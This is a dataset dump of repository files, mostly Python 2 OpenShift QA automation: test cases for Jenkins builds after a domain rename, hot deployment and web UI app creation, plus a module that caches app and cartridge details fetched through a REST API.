sqlite3\r\n\r\n前端使用的 bootstrap + jquery\r\n\r\n依赖包:\r\n* python-markdown, $ sudo yum install python-markdown\r\n* python-pygments, $ sudo yum install python-pygments\r\n" }, { "alpha_fraction": 0.5215947031974792, "alphanum_fraction": 0.5313323140144348, "avg_line_length": 40.1698112487793, "blob_id": "5dde80c9b7ae68fb9e382ea62eed45604dcf775f", "content_id": "d6013a997b7c6e6750d8398e5de273560c1fab91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8729, "license_type": "no_license", "max_line_length": 195, "num_lines": 212, "path": 
"/automation/open/testmodules/RT/cartridge/jenkins_after_alter_namespace.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n\nRefactoring:\nAttila Nagy\[email protected]\nJun 12, 2012\n\n[US1178 & US1034] [rhc-cartridge] jenkins build after alter domain namespace\nhttps://tcms.engineering.redhat.com/case/122370/\n\"\"\"\nimport os\nimport re\nimport rhtest\nimport common\nimport OSConf\nfrom shutil import rmtree\nimport fileinput\n\nclass OpenShiftTest(rhtest.Test):\n \n def initialize(self):\n self.summary = \"[US1178 & US1034] [rhc-cartridge] jenkins build after alter domain namespace\"\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"Missing OPENSHIFT_test_name, used `php` as default.\")\n self.test_variant = \"zend\"\n\n self.domain_name = common.get_domain_name()\n self.new_domain_name = common.getRandomString(10)\n self.app_name = self.test_variant.split('-')[0] + common.getRandomString(10)\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n self.jenkins_name = \"jen\"+common.getRandomString(7)\n self.sshkey_backup_dir = \"/tmp/\"+common.getRandomString(10)\n os.mkdir(self.sshkey_backup_dir)\n self.deployment_configuration = {\n \"php\": { \"index\" : \"php/index.php\" },\n \"zend\" : { \"index\" : \"php/index.php\" },\n \"jbossas\" : { \"index\" : \"src/main/webapp/index.html\" },\n \"jbosseap\" : { \"index\" : \"src/main/webapp/index.html\" },\n \"jbossews\" : { \"index\" : \"src/main/webapp/index.html\" },\n \"jbossews2\" : { \"index\" : \"src/main/webapp/index.html\" },\n \"python\" : { \"index\" : \"wsgi/application\" },\n \"ruby\" : { \"index\" : \"config.ru\" },\n \"perl\" : { \"index\" : \"perl/index.pl\" },\n \"nodejs\" : { \"index\" : \"index.html\" },\n }\n self.deployment_configuration[\"ruby-1.9\"] = self.deployment_configuration[\"ruby\"]\n self.random_string = common.getRandomString()\n common.env_setup()\n\n\n def finalize(self):\n rmtree(self.git_repo)\n #\"10.Move ssh key back\",\n #common.command_get_status(\"test -f %s/id_rsa -a -f %s/id_rsa.pub && rm -f ~/.ssh/id_rsa* && mv %s/id_rsa* ~/.ssh/\"%(self.sshkey_backup_dir,self.sshkey_backup_dir,self.sshkey_backup_dir))\n #rmtree(self.sshkey_backup_dir)\n common.alter_domain(self.domain_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n #common.update_sshkey()\n if self.test_variant in ( \"jbosseap\", \"jbossas\", \"jbossews\",\"jbossews2\"):\n if self.get_run_mode() == \"DEV\":\n pass\n #common.change_node_profile(\"small\")\n\n\nclass JenkinsAfterAlterNamespace(OpenShiftTest):\n \n def deploy_changes(self, source, destination):\n try:\n index_file = self.git_repo + \"/\" + self.deployment_configuration[self.test_variant][\"index\"]\n self.info(\"Editing: \" + index_file)\n for line in fileinput.input(index_file, inplace = True):\n print re.sub(source, destination, line),\n except:\n fileinput.close()\n self.info(\"IO error\")\n return False\n fileinput.close()\n \n deployment_steps = [\n \"cd %s\" % self.app_name,\n \"git commit -a -m testing\",\n ]\n return common.command_getstatusoutput(\" && \".join(deployment_steps))\n \n def test_method(self):\n self.info(\"=============================\")\n self.info(\"1. 
Create an jenkins app\")\n self.info(\"=============================\")\n ret_code = common.create_app(\n self.jenkins_name, common.app_types[\"jenkins\"], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n clone_repo = False\n )\n self.assert_equal(ret_code, 0, \"Failed to create jenkins app\")\n\n self.info(\"=============================\")\n self.info(\"2. Create an app\")\n self.info(\"=============================\")\n ret_code = common.create_app(\n self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n )\n self.assert_equal(ret_code, 0, \"Failed to create %s app: %s\" % (self.app_type, self.app_name))\n \n if self.test_variant in ( \"jbosseap\", \"jbossas\",\"jbossews\", \"jbossews2\"):\n if self.get_run_mode() == \"DEV\":\n pass\n #self.info(\"Changing node profile to 'medium'\")\n #common.change_node_profile(\"medium\")\n \n self.info(\"=============================\")\n self.info(\"3. Embed jenkins client to the app\")\n self.info(\"=============================\")\n ret_code = common.embed(\n self.app_name, \n \"add-\" + common.cartridge_types[\"jenkins\"], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n )\n self.assert_equal(ret_code, 0, \"Failed to embed jenkins client to the app\")\n \n # No need to update SSH key pair now, since it is associated with a user \n # rather than a domain\n\n ''' \n self.info(\"=============================\")\n self.info(\"4. Backup the libra ssh key and create new key pair\")\n self.info(\"=============================\")\n ret_code = common.command_get_status(\"mv ~/.ssh/id_rsa* %s/ && ssh-keygen -t rsa -N '' -f ~/.ssh/id_rsa\" % ( self.sshkey_backup_dir )),\n '''\n\n self.info(\"=============================\")\n self.info(\"5. Alter domain\")\n self.info(\"=============================\")\n ret_code = common.alter_domain(\n self.new_domain_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n )\n self.assert_equal(ret_code, 0, \"Failed to alter domain name\")\n\n '''\n self.info(\"=============================\")\n self.info(\"6. Update ssh key\")\n self.info(\"=============================\")\n ret_code = common.update_sshkey()\n self.assert_equal(ret_code, 0, \"Failed to update ssh key\")\n '''\n\n self.info(\"=============================\")\n self.info(\"7.Change git config file in git repo\")\n self.info(\"=============================\")\n ret_code = common.command_get_status(\"sed -i -e 's/%s/%s/g' %s/.git/config\" % ( self.domain_name, self.new_domain_name, self.git_repo ))\n self.assert_equal(ret_code, 0, \"Failed to change git config file in git repo\")\n \n self.info(\"=============================\")\n self.info(\"8. Make some change in the git repo and git push to trigger jenkins build job\")\n self.info(\"=============================\")\n (ret_code, output) = self.deploy_changes(\"Welcome to OpenShift\", self.random_string)\n self.debug(output)\n ret = common.trigger_jenkins_build(self.app_name)\n self.assert_equal(ret, True, \"Failed to git push the changes to trigger jenkins build job\")\n \n \n self.info(\"=============================\")\n self.info(\"9. 
Check the jenkins build url\")\n self.info(\"=============================\")\n ret_code = common.grep_web_page(\n str(OSConf.default.conf[\"apps\"][self.app_name][\"embed\"][common.cartridge_types[\"jenkins\"]][\"url\"]).replace(self.domain_name, self.new_domain_name), \n \"Last Successful Artifacts\", \n \"-L -k -H 'Pragma: no-cache' -u %s:%s\" % (OSConf.default.conf[\"apps\"][self.jenkins_name][\"username\"], OSConf.default.conf[\"apps\"][self.jenkins_name][\"password\"]),\n 60, 10\n )\n self.assert_equal(ret_code, 0, \"Job URL must be accessed successfully\")\n\n self.info(\"=============================\")\n self.info(\"10. Check if the changes take effect\")\n self.info(\"=============================\")\n ret_code = common.grep_web_page(\n str(OSConf.get_app_url(self.app_name)).replace(self.domain_name, self.new_domain_name), \n self.random_string, \n \"-L -k -H 'Pragma: no-cache'\", \n 15, 6\n )\n self.assert_equal(ret_code, 0, \"Changes must be deployed\")\n \n return self.passed(\"[US1178 & US1034] [rhc-cartridge] jenkins build after alter domain namespace\")\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JenkinsAfterAlterNamespace)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7110157608985901, "alphanum_fraction": 0.725321888923645, "avg_line_length": 24.88888931274414, "blob_id": "c82255dde80171746f51a100c9b435598ab52b13", "content_id": "7d532f09be9ff090c78391d6ad0ce820eefec6ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 699, "license_type": "no_license", "max_line_length": 113, "num_lines": 27, "path": "/automation/open/testmodules/RT/hot_deploy/perl_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nSept 26, 2012\n\"\"\"\nimport rhtest\nimport common\nfrom perl_without_jenkins import PerlHotDeployWithoutJenkins\n\nclass PerlScalingHotDeployWithoutJenkins(PerlHotDeployWithoutJenkins):\n def __init__(self, config):\n PerlHotDeployWithoutJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2443] Hot deployment support for scailing application - perl - without jenkins\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PerlScalingHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6085126399993896, "alphanum_fraction": 0.6323667168617249, "avg_line_length": 26.753246307373047, "blob_id": "eef2da6e51197545df9b843a556c7080f774d6e2", "content_id": "72752f42469b5811a60d485ee9a0b4cd809b7be0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2138, "license_type": "no_license", "max_line_length": 211, "num_lines": 77, "path": "/automation/open/testmodules/UI/web/case_180950.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_180950.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CreateSpringeap6App(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n 
web.login()\n\n #create a springeap6 app\n #web.create_app(\"springeap6\",\"springeap\")\n web.go_to_create_app(\"springeap6\")\n web.input_by_id(\"application_name\", \"springeap\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(50)\n web.assert_text_equal_by_xpath('''Your application has been created. If you're new to OpenShift check out these tips for where to go next.''', '''//div[@id='content']/div/div/div/div[2]/div/section/p''')\n \n #check the \"appurl\" link\n time.sleep(300)\n web.go_to_app_detail(\"springeap\")\n web.click_element_by_xpath('''//div[@id='content']/div/div/div/div[2]/nav/div/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath(\"Spring MVC Starter Application\",'''//title''') \n\n #delete a springeap app\n web.go_to_app_detail(\"springeap\")\n time.sleep(2)\n web.click_element_by_link_text(\"Delete this application\")\n time.sleep(1)\n web.click_element_by_id(\"application_submit\")\n time.sleep(40)\n web.go_to_app_detail(\"springeap\")\n web.assert_text_equal_by_xpath(\"Sorry, but the page you were trying to view does not exist.\", '''//article/div/p''')\n\n\n self.tearDown()\n\n return self.passed(\" case_180950--CreateSpringeap6App passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateSpringeap6App)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_180950.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5367565155029297, "alphanum_fraction": 0.5443044900894165, "avg_line_length": 35.53009796142578, "blob_id": "7e3f77944eed093266ff96d7da81defab746596f", "content_id": "2329641c81a108e3c8d30bf1c8f9fc6a4da71135", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18813, "license_type": "no_license", "max_line_length": 148, "num_lines": 515, "path": "/automation/open/lib/OSConf.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# OpenShift Conf File Operator\n# [email protected]\n# 2011-11-04\n#\nimport os, commands, re\nimport cPickle as pickle\nimport openshift\nfrom helper import *\nimport json\n\n\"\"\"\nNote:\n Access to cached object must be performed only via functions, not directly \n through user object like:\n passwd = OSConf.default['sshkeky']['default]\n but\n passwd = OSConf.get_ssh_key('default')\n\n If such function doesn't exist, please create it. It will be more easier for\n maintanance.\n\"\"\"\n\n\nclass OSConf:\n \"\"\"Class for handling cache of openshift user with all of his settings.\"\"\"\n\n def __init__(self, OSConf_dump = None):\n \"\"\"Tries to load cache file. If whatever error occurs it will create\n a new one\"\"\"\n if OSConf_dump is None:\n self.conf_file = get_cache_file()\n else:\n self.conf_file = OSConf_dump\n try:\n self.load_conf()\n except Exception as e:\n log.warn(\"Unable to load cache: %s\"% e)\n initial_conf(self)\n log.warn(\"New cache has been initialized\")\n\n def load_conf(self):\n f = file(self.conf_file, 'rb')\n self.conf = pickle.load(f)\n f.close()\n\n def dump_conf(self):\n oldumask = os.umask(0000)\n f = file(self.conf_file, 'wb')\n pickle.dump(self.conf, f, True)\n f.close()\n os.umask(oldumask)\n\nglobal default\ndefault = None\n\ndef _get_default():\n \"\"\" Returns the content of pickle file if exists. 
Otherwise it will create\n a new instance of OSConf class with initialization.\"\"\"\n global default\n if default is None:\n default = OSConf()\n return default\n\ndef initial_conf(user=None):\n \"\"\" This function is called, when the cache file doesn't exist.\n * It will try to set up the content.\n * Creates a new cache file.\n @return [Hash] newly initiated object with all of the information\n \"\"\"\n if user is None:\n user = _get_default()\n if ('OPENSHIFT_user_email' not in os.environ) or ('OPENSHIFT_user_passwd' not in os.environ):\n log.error(\"Environment Variables OPENSHIFT_* Not Found.\")\n log.error(\"Please check these ENV var: OPENSHIFT_user_email OPENSHIFT_user_passwd\")\n return -1\n os.environ[\"HOME\"] = os.path.expanduser(\"~\")\n if os.path.exists(user.conf_file):\n os.remove(user.conf_file)\n apps = {}\n user.conf = {}\n try:\n user.conf = setup_by_rest()\n rhlogin = {\n 'email' : os.environ['OPENSHIFT_user_email'], \n 'password': os.environ['OPENSHIFT_user_passwd']}\n user.conf['rhlogin'] = rhlogin\n\n except Exception as e: #we will propagate exception to upper level\n raise e\n finally:\n user.conf['apps'] = apps # we need this for future accessing the empty cache\n user.dump_conf()\n\n return 0\n\n\ndef _initial_sshkey():\n \"\"\" Returns {} if success otherwise returns None \"\"\"\n conf = {}\n (user_email, user_passwd) = get_default_rhlogin()\n\n #let's try it with REST API\n rest = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n (status, data) = rest.keys_list()\n if status not in ('OK','ok'):\n raise Exception(\"Unable to initialize CACHE[sshkey] via REST: %s\"%(status))\n\n for key in json.loads(data)['data']:\n key_name = str(key['name'])\n conf[key_name] = {}\n conf[key_name]['type'] = str(key['type'])\n conf[key_name]['fingerprint'] = sshPKeyToFingerprint(str(key['content']))\n return conf\n\n\ndef get_rhlogin(user=None):\n \"\"\"Returns (login, password) from the cache\"\"\"\n if user is None:\n user = _get_default()\n return user.conf['rhlogin']['email'],user.conf['rhlogin']['password']\n\n\ndef get_sshkeys(user=None):\n \"\"\"Returns all ssh keys, which are stored in the cache\"\"\"\n if user is None:\n user = _get_default()\n try:\n return user.conf['sshkey'].keys()\n except Exception as e:\n log.error('Failed to get all sshkeys: %s' % (e))\n raise\n\ndef get_sshkey(key_name = 'default', user=None):\n if user is None:\n user = _get_default()\n try:\n return (user.conf['sshkey'][key_name]['type'], \n user.conf['sshkey'][key_name]['fingerprint'])\n except:\n log.error('Failed to get sshkey %s' % (key_name))\n raise\n\ndef get_app_names(user=None):\n if user is None:\n user = _get_default()\n return user.conf['apps'].keys()\n\ndef get_apps(user=None):\n if user is None:\n user = _get_default()\n return user.conf['apps']\n\ndef get_app_url(app_name, user = None):\n if user is None:\n user = _get_default()\n if app_name not in user.conf['apps']:\n return 1\n return user.conf['apps'][app_name]['url']\n\ndef get_app_url_X(app_name, user = None):\n if user is None:\n user = _get_default()\n def closure():\n return get_app_url(app_name, user)\n return closure\n\ndef get_git_url(app_name, user = None):\n if user is None:\n user = _get_default()\n if app_name not in user.conf['apps']:\n return 1\n return user.conf['apps'][app_name]['git_url']\n\ndef get_ssh_url(app_name, user = None):\n if user is None:\n user = _get_default()\n if app_name not in user.conf['apps']:\n return 1\n return 
user.conf['apps'][app_name]['git_url'].split('/')[2]\n \n\ndef get_app_uuid(app_name, user = None):\n if user is None:\n user = _get_default()\n if app_name not in user.conf['apps']:\n return 1\n return user.conf['apps'][app_name]['uuid']\n\ndef get_app_uuid_X(app_name, user=None):\n if user is None:\n user = _get_default()\n def closure():\n return get_app_uuid(app_name, user)\n return closure\n\ndef setup_by_rest(user=None):\n \"\"\"\n Returns Dict object with all of the fresh data, given from REST\n - domain\n - apps\n - embedded cartridges\n - ssh keys\n \"\"\"\n conf = {} #we start with empty object\n conf['apps'] = {}\n\n (user_email, user_passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n (status, data) = rest.app_list()\n if status not in ('OK','ok'):\n raise Exception(\"Unable to initialize CACHE via REST: %s\"%(status))\n\n for d in data:\n app_name = d['name']\n conf['apps'][app_name] = {}\n framework = d['framework']\n conf['apps'][app_name]['type'] = framework\n conf['apps'][app_name]['embed'] = {}\n conf['apps'][app_name]['git_url'] = d['git_url']\n #conf['apps'][app_name]['ssh_url'] = d['ssh_url']\n # Hot fix for Bug https://bugzilla.redhat.com/show_bug.cgi?id=950477\n obj = re.match(r'ssh://([^\\s]+)', d['ssh_url'])\n if obj:\n conf['apps'][app_name]['ssh_url'] = str(obj.group(1))\n else:\n conf['apps'][app_name]['ssh_url'] = d['ssh_url']\n conf['apps'][app_name]['uuid'] = d['uuid']\n conf['apps'][app_name]['scalable'] = d['scalable']\n conf['apps'][app_name]['url'] = d['app_url']\n conf['apps'][app_name]['gear_profile'] = d['gear_profile']\n conf['apps'][app_name]['aliases'] = d['aliases']\n # Hot fix fot Bug 956044\n #conf['apps'][app_name]['build_job_url'] = str(d['build_job_url'])\n\n if 'jenkins' in framework:\n (gears, glen) = rest.get_gears(app_name)\n conf['apps'][app_name]['username'] = gears[0]['cartridges'][0]['username']\n conf['apps'][app_name]['password'] = gears[0]['cartridges'][0]['password']\n #HACK due to bug#892878\n if conf['apps'][app_name]['username'] != 'admin':\n f = open('jenkins.password','r')\n credentials = f.read()\n (username, password) = credentials.split(' ')\n conf['apps'][app_name]['username'] = username\n conf['apps'][app_name]['password'] = password\n\n\n (status, data2) = rest.cartridge_list(app_name)\n for cartridge in json.loads(data2)['data']:\n cart_name = cartridge['name']\n emb_cart = {}\n for prop in cartridge['properties']:\n if prop['type'] != 'cart_data':\n continue\n if prop['name'] == 'connection_url':\n obj = re.search(r\"([\\d\\.]+):(\\d+)\", prop['value'])\n if obj:\n emb_cart['url'] = obj.group(1)\n emb_cart['port'] = obj.group(2)\n else:\n emb_cart['url'] = str(prop['value'])\n elif prop['name'] == 'job_url':\n emb_cart['url'] = str(prop['value'])\n emb_cart['job_url'] = str(prop['value'])\n elif prop['name'] == 'database_name':\n emb_cart['database'] = str(prop['value'])\n else:\n # Temporary fix for bug: 903139\n try:\n emb_cart[str(prop['name'])] = str(prop['value'])\n except KeyError:\n print 'Warning: There is no value field for %s of cartridge %s' % (prop['name'], cartridge['name'])\n continue\n if cartridge['name'] == 'rockmongo-1.1':\n emb_cart['username'] = get_embed_info(app_name, 'mongodb-2.2', 'username')\n emb_cart['password'] = get_embed_info(app_name, 'mongodb-2.2', 'password')\n elif cartridge['name'] == 'phpmyadmin-3.4':\n emb_cart['username'] = get_embed_info(app_name, 'mysql-5.1', 'username')\n emb_cart['password'] = 
get_embed_info(app_name, 'mysql-5.1', 'password')\n\n conf['apps'][app_name]['embed'][cart_name] = emb_cart\n\n conf['sshkey'] = _initial_sshkey()\n conf['domain'] = get_domain_name_()\n return conf\n\n\ndef add_app(app_name, framework, output, user=None):\n '''\n This function no more parses output, but takes info from REST.\n '''\n if user is None:\n user = _get_default()\n user.conf['apps'][app_name] = {}\n user.conf['apps'][app_name]['type'] = framework\n user.conf['apps'][app_name]['embed'] = {}\n (user_email, user_passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n (status, data) = rest.app_get_descriptor(app_name)\n d = json.loads(data)['data']\n user.conf['apps'][app_name]['url'] = str(d['app_url']).split('/')[2]\n user.conf['apps'][app_name]['uuid'] = str(d['uuid'])\n user.conf['apps'][app_name]['git_url'] = str(d['git_url'])\n # Hot fix fot Bug 956044\n #user.conf['apps'][app_name]['build_job_url'] = str(d['build_job_url'])\n if 'jenkins' in framework:\n (gears, glen) = rest.get_gears(app_name)\n user.conf['apps'][app_name]['username'] = gears[0]['cartridges'][0]['username']\n user.conf['apps'][app_name]['password'] = gears[0]['cartridges'][0]['password']\n\n #HACK due to bug#892878\n if user.conf['apps'][app_name]['username'] != 'admin':\n username = re.findall(r\"User:\\s+(\\w+)\", output)[-1]\n password = re.findall(r\"Password:\\s+(\\S+)\", output)[-1]\n user.conf['apps'][app_name]['username'] = username\n user.conf['apps'][app_name]['password'] = password\n write_file('jenkins.password',\"%s %s\"%(username, password))\n\n user.dump_conf()\n return 0\n\ndef remove_app(app_name, user=None):\n if user is None:\n user = _get_default()\n try:\n user.conf['apps'].pop(app_name)\n user.dump_conf()\n return 0\n except:\n log.warning(\"the app doesn't exist in OSConf db.\")\n return 1\n\ndef alter_domain(domain_name, user=None):\n \"\"\"\n We have to reinitialize whole cache!\n It doesn't make sense to update particular fields with new domain\n it's too sensitive.\n \"\"\"\n if user is None:\n user = _get_default()\n user.conf = setup_by_rest()\n user.dump_conf()\n return 0\n\ndef add_sshkey(key_name, key_type, fingerprint, user=None):\n \"\"\"\n Returns 0 if successfully added new key into cache.\n \"\"\"\n if user is None:\n user = _get_default()\n if user.conf['sshkey'].has_key(key_name):\n log.error('A ssh key named %s(%s) already exists.' 
% (key_name, user.conf['sshkey'][key_name]['fingerprint']))\n        return 1\n    user.conf['sshkey'][key_name] = {}\n    user.conf['sshkey'][key_name]['type'] = key_type\n    user.conf['sshkey'][key_name]['fingerprint'] = fingerprint\n    user.dump_conf()\n    return 0\n\ndef remove_sshkey(key_name, user=None):\n    \"\"\"Remove the ssh key from the cache only.\n    This method should be called only from common, not directly.\n    @param [String] key_name the name of the key to remove from the cache\n    @return 0 on success, 1 if the key doesn't exist\n    \"\"\"\n    if user is None:\n        user = _get_default()\n    if user.conf['sshkey'].has_key(key_name):\n        user.conf['sshkey'].pop(key_name)\n        user.dump_conf()\n        return 0\n    else:\n        log.error(\"ssh key named %s doesn't exist!\" % (key_name))\n        return 1\n\ndef update_sshkey(key_name, key_type, fingerprint, user=None):\n    if user is None:\n        user = _get_default()\n    if user.conf['sshkey'].has_key(key_name):\n        user.conf['sshkey'][key_name]['type'] = key_type\n        user.conf['sshkey'][key_name]['fingerprint'] = fingerprint\n        user.dump_conf()\n        return 0\n    else:\n        log.error(\"ssh key named %s doesn't exist!\" % (key_name))\n        return 1\n\ndef update_embed(app_name, op, embed_cart, output, user=None):\n    if user is None:\n        user = _get_default()\n    if cmp(op, 'add') == 0:\n        embed_cart = embed_cart.replace('add-','')\n        user.conf['apps'][app_name]['embed'][embed_cart] = {}\n\n        (user_email, user_passwd) = get_default_rhlogin()\n        rest = openshift.Openshift(host=get_instance_ip(),\n                                   user=user_email,\n                                   passwd=user_passwd)\n        (status, data) = rest.cartridge_get(app_name, embed_cart)\n        emb_cart = {}\n\n        for prop in data['data']['properties']:\n            if prop['type'] != 'cart_data':\n                continue\n            if prop['name'] == 'connection_url':\n                ssh_url = get_ssh_url(app_name)\n                (ret, output) = commands.getstatusoutput('''ssh -o LogLevel=quiet %s \"env | grep -P 'OPENSHIFT_\\w+?_DB_(HOST|PORT)'\"''' % (ssh_url))\n                if ret != 0:\n                    print (ret, output)\n                    print ssh_url\n                    print \"Failed to get database connection url via env vars\"\n                else:\n                    for line in output.splitlines():\n                        (key, value) = line.split('=')\n                        if key.find('HOST') != -1:\n                            emb_cart['url'] = value\n                        else:\n                            emb_cart['port'] = value\n                '''\n                obj = re.search(r\"([\\w\\.\\-]+):(\\d+)\", prop['value'])\n                if obj:\n                    emb_cart['url'] = obj.group(1)\n                    emb_cart['port'] = obj.group(2)\n                else:\n                    emb_cart['url'] = str(prop['value'])\n                '''\n            elif prop['name'] == 'database_name':\n                emb_cart['database'] = str(prop['value'])\n            elif prop['name'] == 'job_url':\n                emb_cart['url'] = str(prop['value'])\n            else:\n                # Temporary fix for bug: 903139\n                try:\n                    emb_cart[str(prop[\"name\"])] = str(prop[\"value\"])\n                except KeyError:\n                    print 'Warning: There is no value field for %s of cartridge %s' % (prop['name'], embed_cart)\n                    continue\n        if embed_cart == 'rockmongo-1.1':\n            emb_cart['username'] = get_embed_info(app_name, 'mongodb-2.2', 'username')\n            emb_cart['password'] = get_embed_info(app_name, 'mongodb-2.2', 'password')\n            # Temporary fix of rockmongo\n            emb_cart['url'] = get_app_url(app_name) + '/rockmongo/'\n        elif embed_cart == 'jenkins-client-1.4':\n            # Hot fix for Bug 956044\n            # https://jenkins-dev3184tst.dev.rhcloud.com/job/prl-build\n            (status1, data1) = rest.app_get(app_name)\n            user.conf['apps'][app_name]['build_job_url'] = data1['build_job_url']\n            emb_cart['url'] = data1['build_job_url']\n            print emb_cart['url']\n        elif embed_cart == 'phpmyadmin-3.4':\n            emb_cart['username'] = get_embed_info(app_name, 'mysql-5.1', 'username')\n            
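#
# --- illustrative aside, not part of OSConf.py ---
# Standalone sketch of the parsing update_embed() performs above: turning
# the `env | grep -P 'OPENSHIFT_\w+?_DB_(HOST|PORT)'` output fetched over
# ssh into the url/port fields of a cartridge cache entry. The sample
# output is an assumption shaped like a real gear's environment.
sample_output = (
    "OPENSHIFT_MYSQL_DB_HOST=127.0.250.1\n"
    "OPENSHIFT_MYSQL_DB_PORT=3306"
)
emb_cart = {}
for line in sample_output.splitlines():
    key, value = line.split("=", 1)  # split once, in case a value holds '='
    if "HOST" in key:
        emb_cart["url"] = value
    else:
        emb_cart["port"] = value
assert emb_cart == {"url": "127.0.250.1", "port": "3306"}
# --- end aside ---
#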
emb_cart['password'] = get_embed_info(app_name, 'mysql-5.1', 'password')\n emb_cart['url'] = get_app_url(app_name) + '/phpmyadmin/'\n #finally, update user.conf[...]\n user.conf['apps'][app_name]['embed'][embed_cart] = emb_cart\n elif cmp(op, 'remove') == 0:\n embed_cart = embed_cart.replace('remove-','')\n user.conf['apps'][app_name]['embed'].pop(embed_cart)\n else:\n return 1\n user.dump_conf()\n return 0\n\ndef get_embed_info(app_name, embed_cart, info = None, user=None):\n if user is None:\n user = _get_default()\n if app_name not in user.conf['apps']:\n return 1\n if embed_cart not in user.conf['apps'][app_name]['embed']:\n return 1\n if info == None:\n return user.conf['apps'][app_name]['embed'][embed_cart]\n return user.conf['apps'][app_name]['embed'][embed_cart][info]\n\ndef get_embed_info_X(app_name, embed_cart, info = None, user=None):\n def closure():\n return get_embed_info(app_name, embed_cart, info, user=user)\n return closure\n\ndef get_cache_file():\n \"\"\"\n Returns a default name for cache file.\n \"\"\"\n (user, passwd) = get_default_rhlogin()\n return \"%s/OPENSHIFT_OSConf-%s.dump\" % (get_tmp_dir(), user)\n\n# hot fix for Bug 912255, obtaining DB credentials with env vars instead of REST API\n#def get_db_cred(db_type)\n# db_cred = {\n\n# 'database' : os.environ['OPENSHIFT_APP_NAME'],\n# 'url' : os.environ['OPENSHIFT_' + db_type + '_DB_HOST'],\n# 'port' : os.environ['OPENSHIFT_' + db_type + '_DB_PORT'],\n# 'username' : os.environ['OPENSHIFT_' + db_type + '_DB_USERNAME'],\n# 'password' : os.environ['OPENSHIFT_' + db_type + '_DB_PASSWORD']\n\n# } \n\n# return db_cred\n\n\n\n# debugging\nif __name__ == \"__main__\":\n# initial_conf()\n #print default.conf\n pass\n" }, { "alpha_fraction": 0.6811867356300354, "alphanum_fraction": 0.6948434114456177, "avg_line_length": 34.082645416259766, "blob_id": "2b459fa4118fde4943cd34c5251d1b1a017425a6", "content_id": "e0f137833f933cf3e85e62639a855ee6f30f79b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4247, "license_type": "no_license", "max_line_length": 113, "num_lines": 121, "path": "/automation/open/lib/config.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n##Gloabal varible configuration\n#set gloable varible values\nimport string\nimport ConfigParser\n\nconfigparse = ConfigParser.RawConfigParser()\nconfigparse.read('/home/pruan/work/rhtest/etc/config.cfg')\ntimeoutsec=configparse.get('environment', 'timeoutsec')\npassword=configparse.get('environment', 'password')\nbrowser=configparse.get('environment', 'browser')\nbrowserpath=configparse.get('environment', 'browserpath')\nproxy=configparse.getboolean('environment', 'proxy')\nurl=configparse.get('environment', 'url')\nresultfile=configparse.get('output', 'resultfile')\ndescription=configparse.get('output', 'description')\ntitle=configparse.get('output', 'title')\nconfirm_url_express=configparse.get('environment', 'confirm_url_express')\nconfirm_url_express_yujzhang=configparse.get('environment', 'confirm_url_express_yujzhang')\nconfirm_url_express_yujzhang_invalidkey=configparse.get('environment', 'confirm_url_express_yujzhang_invalidkey')\nconfirm_url_flex=configparse.get('environment', 'confirm_url_flex')\nrestricted_user=configparse.get('environment', 'restricted_user')\ninvalid_user=configparse.get('environment', 'invalid_user')\ntoregister_user=configparse.get('environment', 'toregister_user')\nnew_user=configparse.get('environment', 